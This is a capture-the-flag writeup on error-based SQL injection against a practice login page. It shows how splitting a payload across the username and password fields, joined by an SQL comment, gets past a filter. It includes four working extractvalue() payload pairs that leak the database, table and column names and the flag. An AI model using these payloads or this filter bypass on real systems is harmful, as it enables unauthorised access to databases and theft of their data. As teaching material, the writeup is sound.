Error-based SQL injection -- challenge writeup (inline comments and error-reporting functions)

Challenge URL: http://ctf5.shiyanbar.com/web/baocuo/index.php

A few quick probes show the two kinds of response: an ordinary wrong username or password returns "Login failed", while anything that trips the WAF returns a message in red.

Next I probed the backend's filtering. It turned out that ( and ) are not allowed in username, so no function can be called from that field. Does that rule out error-based injection?

What about injecting through password? The backend queries both fields, so password is injectable too. However, the error-reporting functions such as floor() and extractvalue() are blocked in password, so error-based injection cannot be done from password alone either.

The idea, then, is to put the name of the error-reporting function in username and the rest of the expression in password. The obstacle is the ' and password=' that the backend inserts between the two values. How do we get rid of it?

Recall the shape of the query: where username='???' and password='???'. MySQL treats /* ... */ as a comment, and quote characters inside a comment neither open nor close a string literal. So if username opens a comment with /* and password closes it with */, everything the backend inserts between the two values is commented out and the two fragments join into a single expression. The /* and */ tokens themselves are not filtered. Splitting one payload across several HTTP parameters like this is known as HTTP parameter fragmentation (HPF), sometimes translated as HTTP split injection.

Set username to ' or extractvalue /* and password to */(1, concat(0x5c,(select database()))) or ' . Once the backend concatenates them, the query becomes:

select * from users where username='' or extractvalue /*' and password='*/(1, concat(0x5c,(select database()))) or ''

and the database name comes back in the error message.

The first post parameters are:

username=1' or  extractvalue/*

password=*/(1, concat(0x3A,(select database()))) or '1

This leaks the database name:

XPATH syntax error: ':error_based_hpf'

The second post parameters are (now extracting the table names; note that = is filtered, so use in or regexp instead):

username=1' or  extractvalue/*

password=*/(1,concat(0x3A,(select group_concat(table_name) from information_schema.tables where table_schema regexp 'error_based_hpf'))) or '1

This leaks the table names:

XPATH syntax error: ':ffll44jj,users'

The third post parameters are:

username=1' or extractvalue/*

password=*/(0x5c,concat(0x3A,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'))) or '1

This leaks the columns of the table:

XPATH syntax error: ':value'

The fourth post parameters are:

username=1' or extractvalue/*

password=*/(1,concat(0x3A,(select group_concat(value) from ffll44jj))) or '1

This leaks the flag:

XPATH syntax error: ':flag{err0r_b4sed_sqli_+_hpf}'